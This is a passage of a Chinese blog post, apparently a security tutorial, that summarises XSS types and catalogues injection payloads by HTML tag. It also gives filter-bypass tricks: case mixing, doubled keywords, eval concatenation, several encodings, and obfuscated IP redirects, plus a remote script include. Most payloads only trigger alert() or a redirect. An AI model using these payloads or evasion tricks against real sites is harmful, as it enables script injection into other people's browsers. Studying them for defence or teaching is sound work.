<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>xss总结 | 七友 | 路漫漫其修远兮，吾将上下而求索</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="xss,web安全">
    <meta name="description" content="文章首发于先知社区https://xz.aliyun.com/t/4067  简述XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行">
<meta name="keywords" content="xss,web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="xss总结">
<meta property="og:url" content="https://byqiyou.github.io/2019/02/16/xss总结/index.html">
<meta property="og:site_name" content="七友">
<meta property="og:description" content="文章首发于先知社区https://xz.aliyun.com/t/4067  简述XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190208102122-3a40fff4-2b48-1.gif">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190208103630-5775e02e-2b4a-1.gif">
<meta property="og:updated_time" content="2019-05-14T16:30:36.068Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="xss总结">
<meta name="twitter:description" content="文章首发于先知社区https://xz.aliyun.com/t/4067  简述XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190208102122-3a40fff4-2b48-1.gif">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname"></h5>
          <a href="mailto:1920854803@qq.com" title="1920854803@qq.com" class="mail">1920854803@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories"  >
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/byqiyou" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/friends"  >
                <i class="icon icon-lg icon-friends"></i>
                Friends
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/about"  >
                <i class="icon icon-lg icon-about"></i>
                About
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">xss总结</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="输入感兴趣的关键字">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">xss总结</h1>
        <h5 class="subtitle">
            
                <time datetime="2019-02-16T02:16:24.000Z" itemprop="datePublished" class="page-time">
  2019-02-16
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#简述"><span class="post-toc-number">1.</span> <span class="post-toc-text">简述</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#常用的XSS攻击手段和目的"><span class="post-toc-number">2.</span> <span class="post-toc-text">常用的XSS攻击手段和目的</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#分类"><span class="post-toc-number">3.</span> <span class="post-toc-text">分类</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#反射型"><span class="post-toc-number">3.1.</span> <span class="post-toc-text">反射型</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#存储型"><span class="post-toc-number">3.2.</span> <span class="post-toc-text">存储型</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#DOM型"><span class="post-toc-number">3.3.</span> <span class="post-toc-text">DOM型</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#无任何过滤情况下"><span class="post-toc-number">4.</span> <span class="post-toc-text">无任何过滤情况下</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#一些常见标签"><span class="post-toc-number">4.1.</span> <span class="post-toc-text">一些常见标签</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-scirpt-gt"><span class="post-toc-number">4.1.1.</span> <span class="post-toc-text">&lt;scirpt&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-img-gt"><span class="post-toc-number">4.1.2.</span> <span class="post-toc-text">&lt;img&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-input-gt"><span class="post-toc-number">4.1.3.</span> <span class="post-toc-text">&lt;input&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-details-gt"><span class="post-toc-number">4.1.4.</span> <span class="post-toc-text">&lt;details&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-svg-gt"><span class="post-toc-number">4.1.5.</span> <span class="post-toc-text">&lt;svg&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-select-gt"><span class="post-toc-number">4.1.6.</span> <span class="post-toc-text">&lt;select&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-iframe-gt"><span class="post-toc-number">4.1.7.</span> <span class="post-toc-text">&lt;iframe&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-video-gt"><span class="post-toc-number">4.1.8.</span> <span class="post-toc-text">&lt;video&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-audio-gt"><span class="post-toc-number">4.1.9.</span> <span class="post-toc-text">&lt;audio&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-body-gt"><span class="post-toc-number">4.1.10.</span> <span class="post-toc-text">&lt;body&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-textarea-gt"><span class="post-toc-number">4.1.11.</span> <span class="post-toc-text">&lt;textarea&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-keygen-gt"><span class="post-toc-number">4.1.12.</span> <span class="post-toc-text">&lt;keygen&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-marquee-gt"><span class="post-toc-number">4.1.13.</span> <span class="post-toc-text">&lt;marquee&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#lt-isindex-gt"><span class="post-toc-number">4.1.14.</span> <span class="post-toc-text">&lt;isindex&gt;</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#利用link远程包含js文件"><span class="post-toc-number">4.1.15.</span> <span class="post-toc-text">利用link远程包含js文件</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#javascript伪协议"><span class="post-toc-number">4.1.16.</span> <span class="post-toc-text">javascript伪协议</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#其它"><span class="post-toc-number">4.1.17.</span> <span class="post-toc-text">其它</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#有过滤的情况下"><span class="post-toc-number">5.</span> <span class="post-toc-text">有过滤的情况下</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#过滤空格"><span class="post-toc-number">5.1.</span> <span class="post-toc-text">过滤空格</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#过滤关键字"><span class="post-toc-number">5.2.</span> <span class="post-toc-text">过滤关键字</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#大小写绕过"><span class="post-toc-number">5.2.1.</span> <span class="post-toc-text">大小写绕过</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#双写关键字"><span class="post-toc-number">5.2.2.</span> <span class="post-toc-text">双写关键字</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#字符拼接"><span class="post-toc-number">5.2.3.</span> <span class="post-toc-text">字符拼接</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#其它字符混淆"><span class="post-toc-number">5.2.4.</span> <span class="post-toc-text">其它字符混淆</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#编码绕过"><span class="post-toc-number">5.2.5.</span> <span class="post-toc-text">编码绕过</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#过滤双引号，单引号"><span class="post-toc-number">5.3.</span> <span class="post-toc-text">过滤双引号，单引号</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#过滤括号"><span class="post-toc-number">5.4.</span> <span class="post-toc-text">过滤括号</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#过滤url地址"><span class="post-toc-number">5.5.</span> <span class="post-toc-text">过滤url地址</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#使用url编码"><span class="post-toc-number">5.5.1.</span> <span class="post-toc-text">使用url编码</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#使用IP"><span class="post-toc-number">5.5.2.</span> <span class="post-toc-text">使用IP</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#如何防止xss"><span class="post-toc-number">6.</span> <span class="post-toc-text">如何防止xss</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#后记"><span class="post-toc-number">7.</span> <span class="post-toc-text">后记</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Reference"><span class="post-toc-number">8.</span> <span class="post-toc-text">Reference</span></a></li></ol>
        </nav>
    </aside>


<article id="post-xss总结"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">xss总结</h1>
        <div class="post-meta">
            <time class="post-time" title="2019-02-16 10:16:24" datetime="2019-02-16T02:16:24.000Z"  itemprop="datePublished">2019-02-16</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <blockquote>
<p>文章首发于先知社区<a href="https://xz.aliyun.com/t/4067" target="_blank" rel="noopener">https://xz.aliyun.com/t/4067</a></p>
</blockquote>
<h1 id="简述"><a href="#简述" class="headerlink" title="简述"></a>简述</h1><p>XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。</p>
<h1 id="常用的XSS攻击手段和目的"><a href="#常用的XSS攻击手段和目的" class="headerlink" title="常用的XSS攻击手段和目的"></a>常用的XSS攻击手段和目的</h1><pre><code>1.盗用cookie，获取敏感信息。
2.利用植入Flash，通过crossdomain权限设置进一步获取更高权限；或者利用Java等得到类似的操作。
3.利用iframe、frame、XMLHttpRequest或上述Flash等方式，以（被攻击）用户的身份执行一些管理动作，或执行一些一般的操作如发微博、加好友、发私信等操作。
4.利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动。
5.在访问量极大的一些页面上的XSS可以攻击一些小型网站，实现DDOS攻击的效果。
</code></pre><h1 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h1><h2 id="反射型"><a href="#反射型" class="headerlink" title="反射型"></a>反射型</h2><pre><code>反射型跨站脚本（Reflected Cross-Site Scripting）是最常见，也是使用最广的一种，可将恶意脚本附加到 URL 地址的参数中。
反射型 XSS 的利用一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies 或进行钓鱼欺骗。
</code></pre><h2 id="存储型"><a href="#存储型" class="headerlink" title="存储型"></a>存储型</h2><pre><code>持久型跨站脚本（Persistent Cross-Site Scripting）也等同于存储型跨站脚本（Stored Cross-Site Scripting）。
此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。
</code></pre><h2 id="DOM型"><a href="#DOM型" class="headerlink" title="DOM型"></a>DOM型</h2><pre><code>传统的 XSS 漏洞一般出现在服务器端代码中，而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞，所以，受客户端浏览器的脚本代码所影响。客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型，因此能够决定用于加载当前页面的 URL。换句话说，客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容，它不依赖于服务器端的数据，而从客户端获得 DOM 中的数据（如从 URL 中提取数据）并在本地执行。另一方面，浏览器用户可以操纵 DOM 中的一些对象，例如 URL、location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到基于 DOM 的 XSS 攻击。
</code></pre><h1 id="无任何过滤情况下"><a href="#无任何过滤情况下" class="headerlink" title="无任何过滤情况下"></a>无任何过滤情况下</h1><h2 id="一些常见标签"><a href="#一些常见标签" class="headerlink" title="一些常见标签"></a>一些常见标签</h2><p><strong>PS：下面我列举的标签大部分是可以自动触发js代码的，无需用户去交互，大部分情况下我们也是希望是自动触发而不是等用户去触发，还有我测试的浏览器是火狐，Chrome，IE11.0，其它的浏览器没有去测试，有兴趣的师傅可以测试一下 =。=</strong></p>
<h3 id="lt-scirpt-gt"><a href="#lt-scirpt-gt" class="headerlink" title="<scirpt>"></a><code>&lt;scirpt&gt;</code></h3><pre><code>&lt;scirpt&gt;alert("xss");&lt;/script&gt;
</code></pre><h3 id="lt-img-gt"><a href="#lt-img-gt" class="headerlink" title="<img>"></a><code>&lt;img&gt;</code></h3><pre><code>&lt;img src=1 onerror=alert("xss");&gt;
</code></pre><h3 id="lt-input-gt"><a href="#lt-input-gt" class="headerlink" title="<input>"></a><code>&lt;input&gt;</code></h3><pre><code>&lt;input onfocus="alert('xss');"&gt;
</code></pre><pre><code>竞争焦点，从而触发onblur事件
&lt;input onblur=alert("xss") autofocus&gt;&lt;input autofocus&gt;
</code></pre><pre><code>通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
&lt;input onfocus="alert('xss');" autofocus&gt;
</code></pre><h3 id="lt-details-gt"><a href="#lt-details-gt" class="headerlink" title="<details>"></a><code>&lt;details&gt;</code></h3><pre><code>&lt;details ontoggle="alert('xss');"&gt;
</code></pre><pre><code>使用open属性触发ontoggle事件，无需用户去触发
&lt;details open ontoggle="alert('xss');"&gt;
</code></pre><h3 id="lt-svg-gt"><a href="#lt-svg-gt" class="headerlink" title="<svg>"></a><code>&lt;svg&gt;</code></h3><pre><code>&lt;svg onload=alert("xss");&gt;
</code></pre><h3 id="lt-select-gt"><a href="#lt-select-gt" class="headerlink" title="<select>"></a><code>&lt;select&gt;</code></h3><pre><code>&lt;select onfocus=alert(1)&gt;&lt;/select&gt;
</code></pre><pre><code>通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
&lt;select onfocus=alert(1) autofocus&gt;
</code></pre><h3 id="lt-iframe-gt"><a href="#lt-iframe-gt" class="headerlink" title="<iframe>"></a><code>&lt;iframe&gt;</code></h3><pre><code>&lt;iframe onload=alert("xss");&gt;&lt;/iframe&gt;
</code></pre><h3 id="lt-video-gt"><a href="#lt-video-gt" class="headerlink" title="<video>"></a><code>&lt;video&gt;</code></h3><pre><code>&lt;video&gt;&lt;source onerror="alert(1)"&gt;
</code></pre><h3 id="lt-audio-gt"><a href="#lt-audio-gt" class="headerlink" title="<audio>"></a><code>&lt;audio&gt;</code></h3><pre><code>&lt;audio src=x  onerror=alert("xss");&gt;
</code></pre><h3 id="lt-body-gt"><a href="#lt-body-gt" class="headerlink" title="<body>"></a><code>&lt;body&gt;</code></h3><pre><code>&lt;body/onload=alert("xss");&gt;
</code></pre><p>利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发</p>
<pre><code>&lt;body
onscroll=alert("xss");&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;
</code></pre><h3 id="lt-textarea-gt"><a href="#lt-textarea-gt" class="headerlink" title="<textarea>"></a><code>&lt;textarea&gt;</code></h3><pre><code>&lt;textarea onfocus=alert("xss"); autofocus&gt;
</code></pre><h3 id="lt-keygen-gt"><a href="#lt-keygen-gt" class="headerlink" title="<keygen>"></a><code>&lt;keygen&gt;</code></h3><pre><code>&lt;keygen autofocus onfocus=alert(1)&gt; //仅限火狐
</code></pre><h3 id="lt-marquee-gt"><a href="#lt-marquee-gt" class="headerlink" title="<marquee>"></a><code>&lt;marquee&gt;</code></h3><pre><code>&lt;marquee onstart=alert("xss")&gt;&lt;/marquee&gt; //Chrome不行，火狐和IE都可以
</code></pre><h3 id="lt-isindex-gt"><a href="#lt-isindex-gt" class="headerlink" title="<isindex>"></a><code>&lt;isindex&gt;</code></h3><pre><code>&lt;isindex type=image src=1 onerror=alert("xss")&gt;//仅限于IE
</code></pre><h3 id="利用link远程包含js文件"><a href="#利用link远程包含js文件" class="headerlink" title="利用link远程包含js文件"></a>利用link远程包含js文件</h3><p><strong> PS：在无CSP的情况下才可以 </strong></p>
<pre><code>&lt;link rel=import href="http://127.0.0.1/1.js"&gt;
</code></pre><h3 id="javascript伪协议"><a href="#javascript伪协议" class="headerlink" title="javascript伪协议"></a>javascript伪协议</h3><p><code>&lt;a&gt;</code>标签</p>
<pre><code>&lt;a href="javascript:alert(`xss`);"&gt;xss&lt;/a&gt;
</code></pre><p><code>&lt;iframe&gt;</code>标签</p>
<pre><code>&lt;iframe src=javascript:alert('xss');&gt;&lt;/iframe&gt;
</code></pre><p><code>&lt;img&gt;</code>标签</p>
<pre><code>&lt;img src=javascript:alert('xss')&gt;//IE7以下
</code></pre><p><code>&lt;form&gt;</code>标签</p>
<pre><code>&lt;form action="Javascript:alert(1)"&gt;&lt;input type=submit&gt;
</code></pre><h3 id="其它"><a href="#其它" class="headerlink" title="其它"></a>其它</h3><p><code>expression</code>属性</p>
<pre><code>&lt;img style="xss:expression(alert('xss''))"&gt; // IE7以下
&lt;div style="color:rgb(''&amp;#0;x:expression(alert(1))"&gt;&lt;/div&gt; //IE7以下
&lt;style&gt;#test{x:expression(alert(/XSS/))}&lt;/style&gt; // IE7以下
</code></pre><p>background属性</p>
<pre><code>&lt;table background=javascript:alert(1)&gt;&lt;/table&gt; //在Opera 10.5和IE6上有效
</code></pre><h1 id="有过滤的情况下"><a href="#有过滤的情况下" class="headerlink" title="有过滤的情况下"></a>有过滤的情况下</h1><h2 id="过滤空格"><a href="#过滤空格" class="headerlink" title="过滤空格"></a>过滤空格</h2><p>用<code>/</code>代替空格</p>
<pre class=" language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>img<span class="token operator">/</span>src<span class="token operator">=</span><span class="token string">"x"</span><span class="token operator">/</span>onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span>
</code></pre>
<h2 id="过滤关键字"><a href="#过滤关键字" class="headerlink" title="过滤关键字"></a>过滤关键字</h2><h3 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h3><pre class=" language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>ImG sRc<span class="token operator">=</span>x onerRor<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span>
</code></pre>
<h3 id="双写关键字"><a href="#双写关键字" class="headerlink" title="双写关键字"></a>双写关键字</h3><p>有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过</p>
<pre class=" language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>imimgg srsrcc<span class="token operator">=</span>x onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span>
</code></pre>
<h3 id="字符拼接"><a href="#字符拼接" class="headerlink" title="字符拼接"></a>字符拼接</h3><p>利用eval</p>
<pre class=" language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)"</span><span class="token operator">></span>
</code></pre>
<p>利用top</p>
<pre><code>&lt;script&gt;top["al"+"ert"](`xss`);&lt;/script&gt;
</code></pre><h3 id="其它字符混淆"><a href="#其它字符混淆" class="headerlink" title="其它字符混淆"></a>其它字符混淆</h3><p>有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了<br>下面举几个简单的例子</p>
<pre><code>可利用注释、标签的优先级等
1.&lt;&lt;script&gt;alert("xss");//&lt;&lt;/script&gt;
2.&lt;title&gt;&lt;img src=&lt;/title&gt;&gt;&lt;img src=x onerror="alert(`xss`);"&gt; //因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效
3.&lt;SCRIPT&gt;var a="\\";alert("xss");//";&lt;/SCRIPT&gt;
</code></pre><h3 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h3><p>Unicode编码绕过</p>
<pre class=" language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#34;&amp;#120;&amp;#115;&amp;#115;&amp;#34;&amp;#41;&amp;#59;"</span><span class="token operator">></span>

<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')"</span><span class="token operator">></span>
</code></pre>
<p>url编码绕过</p>
<pre class=" language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"</span><span class="token operator">></span>
</code></pre>
<pre><code>&lt;iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"&gt;&lt;/iframe&gt;
</code></pre><p>Ascii码绕过</p>
<pre class=" language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))"</span><span class="token operator">></span>
</code></pre>
<p>hex绕过</p>
<pre><code>&lt;img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')&gt;
</code></pre><p>八进制</p>
<pre><code>&lt;img src=x onerror=alert('\170\163\163')&gt;
</code></pre><p>base64绕过</p>
<pre><code>&lt;img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"&gt;
</code></pre><pre><code>&lt;iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="&gt;
</code></pre><h2 id="过滤双引号，单引号"><a href="#过滤双引号，单引号" class="headerlink" title="过滤双引号，单引号"></a>过滤双引号，单引号</h2><p>1.如果是html标签中，我们可以不用引号。如果是在js中，我们可以用反引号代替单双引号</p>
<pre><code>&lt;img src="x" onerror=alert(`xss`);&gt;
</code></pre><p>2.使用编码绕过，具体看上面我列举的例子，我就不多赘述了</p>
<h2 id="过滤括号"><a href="#过滤括号" class="headerlink" title="过滤括号"></a>过滤括号</h2><p>当括号被过滤的时候可以使用throw来绕过</p>
<pre><code>&lt;svg/onload="window.onerror=eval;throw'=alert\x281\x29';"&gt;
</code></pre><h2 id="过滤url地址"><a href="#过滤url地址" class="headerlink" title="过滤url地址"></a>过滤url地址</h2><h3 id="使用url编码"><a href="#使用url编码" class="headerlink" title="使用url编码"></a>使用url编码</h3><pre><code>&lt;img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`&gt;
</code></pre><h3 id="使用IP"><a href="#使用IP" class="headerlink" title="使用IP"></a>使用IP</h3><p>1.十进制IP</p>
<pre><code>&lt;img src="x" onerror=document.location=`http://2130706433/`&gt;
</code></pre><p>2.八进制IP</p>
<pre><code>&lt;img src="x" onerror=document.location=`http://0177.0.0.01/`&gt;
</code></pre><p>3.hex</p>
<pre><code>&lt;img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`&gt;
</code></pre><p>4.html标签中用<code>//</code>可以代替<code>http://</code></p>
<pre><code>&lt;img src="x" onerror=document.location=`//www.baidu.com`&gt;
</code></pre><p>5.使用<code>\\</code></p>
<pre><code>但是要注意在windows下\本身就有特殊用途，是一个path 的写法，所以\\在Windows下是file协议，在linux下才会是当前域的协议
</code></pre><p>Windows下<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190208102122-3a40fff4-2b48-1.gif" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure><br>Linux下<br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190208103630-5775e02e-2b4a-1.gif" alt="" title="">
                </div>
                <div class="image-caption"></div>
